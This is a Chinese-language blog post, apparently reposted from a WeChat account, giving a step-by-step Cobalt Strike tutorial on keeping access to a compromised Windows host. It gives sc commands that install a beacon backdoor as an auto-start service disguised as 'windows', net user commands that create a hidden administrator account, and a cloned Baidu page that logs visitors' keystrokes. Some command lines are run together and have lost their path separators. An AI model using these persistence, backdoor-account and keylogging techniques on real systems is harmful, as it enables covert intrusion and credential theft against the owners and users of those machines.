Cobalt Strike系列六Cobalt Strike权限维持

admin 2023年10月31日10:11:41评论16 views字数 937阅读3分7秒阅读模式

一、开机自启动

0x01 后门木马维持权限

(1):生成一个后门木马

Attacks-->Packages-->Windows Executable

Cobalt Strike系列六Cobalt Strike权限维持

(2):选择监听

Cobalt Strike系列六Cobalt Strike权限维持

(3):在目标主机的beacon中执行如下命令

cd C:WINDOWSTempupload /root/beacon.exeshell sc create "windows" binpath= "C:WINDOWSTempbeacon.exe"shell sc description "windows" "description"shell sc config "windows" start= autoshell net start "windows"

Cobalt Strike系列六Cobalt Strike权限维持

这样就会开机自启动该进程,这样就会运行beacon.exe这个文件。

二、创建隐藏用户

0x01 创建隐藏用户

net user hacker$ 1qaz@WSX /addnet localgroup administrators hacker$ /add

Cobalt Strike系列六Cobalt Strike权限维持

0x02 net user查看时用户已隐藏

net user

Cobalt Strike系列六Cobalt Strike权限维持

0x03 查看隐藏的用户

控制面板-->管理工具-->计算机管理-->本地用户和组-->用户

Cobalt Strike系列六Cobalt Strike权限维持

三、网站克隆

0x01 网站克隆

(1):Attacks-->Web Drive-by-->Clone Site

Cobalt Strike系列六Cobalt Strike权限维持

(2):克隆百度页面

Cobalt Strike系列六Cobalt Strike权限维持

(3):克隆成功

Cobalt Strike系列六Cobalt Strike权限维持


0x02 进行监听

(1):模拟受害者进行搜索

Cobalt Strike系列六Cobalt Strike权限维持

(2):查看是否进行了记录

View-->WebLog

Cobalt Strike系列六Cobalt Strike权限维持

Cobalt Strike系列六Cobalt Strike权限维持

发现对输入的键盘已经进行了记录。

Cobalt Strike系列六Cobalt Strike权限维持

原文始发于微信公众号(想走安全的小白):Cobalt Strike系列六----Cobalt Strike权限维持

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日10:11:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cobalt Strike系列六Cobalt Strike权限维持https://cn-sec.com/archives/886375.html

发表评论

匿名网友 填写信息